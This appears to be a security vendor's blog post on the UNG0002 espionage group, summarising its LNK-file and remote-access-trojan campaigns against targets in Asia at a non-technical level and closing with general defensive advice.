Who Is UNG0002?
UNG0002 is a cyber threat group. It has launched espionage campaigns against several countries in Asia.
Since May 2024, this group has targeted China, Hong Kong, and Pakistan. The attackers use shortcut (LNK) files and Remote Access Trojans (RATs) to break into systems.
Experts believe the group is based in Southeast Asia. However, their exact origin is still unknown.
Campaigns and Tactics
Researchers have tracked two major campaigns by this group: Operation Cobalt Whisper and Operation AmberMist.
Operation Cobalt Whisper ran from May to September 2024. It involved ZIP files shared through spear-phishing emails. These files carried LNK shortcuts and VBScript payloads.
These shortcuts triggered tools like PowerShell and CMD to install Cobalt Strike — a known post-exploitation tool.
Operation AmberMist occurred between January and May 2025. Attackers used resume-themed LNK files as lures. These files launched malware in stages, ending with the INET RAT and Blister DLL loader.
Why LNK Files Are Dangerous
LNK files are Windows shortcuts. Normally, they point to files or apps. However, attackers now use them to run malicious commands.
With macros disabled by default in Office, cybercriminals are turning to LNK files. These shortcuts are now part of many modern phishing strategies.
They trick systems into downloading harmful files using trusted tools like PowerShell, MSHTA, or CMD.
What Malware Is Being Used?
Three main types of malware appear in these campaigns:
- Shadow RAT: Allows attackers to control infected systems remotely.
- INET RAT: A variant of Shadow RAT with improved features.
- Blister DLL Loader: A stealthy implant that loads malicious code.
These tools allow full remote access, data theft, and deeper system infiltration. Attackers hide them well using DLL side-loading and shellcode injections.
Who’s Being Targeted?
The attackers focus on sectors that handle sensitive information. These include:
- Defense and aviation
- Engineering and energy
- Healthcare and academia
- Software and cybersecurity
Their goal appears to be stealing intellectual property and confidential data from these industries.
Sophisticated Tactics Reveal a Skilled Team
UNG0002’s tactics are consistent yet evolving. They use spear-phishing, fake government pages, and CAPTCHA screens to trick victims.
For example, some fake emails redirected users to lookalike government websites. These pages triggered PowerShell commands using ClickFix-style attacks.
Once inside, attackers used RATs and loaders to maintain access. The campaigns were highly targeted and technically advanced.
How to Stay Protected
To reduce the risk of attacks like these, organizations should implement strong email filtering and sandboxing tools. It’s crucial to monitor endpoint behavior and block suspicious command-line activity early.
Threat detection systems with live monitoring can help spot abnormal behavior like LNK file abuse. Regular security awareness training is also key to defending against spear-phishing emails and fake resumes.
Some protection platforms offer tools that detect LNK-based threats, block remote access implants, and respond automatically to prevent data loss.
Sleep well, we got you covered.
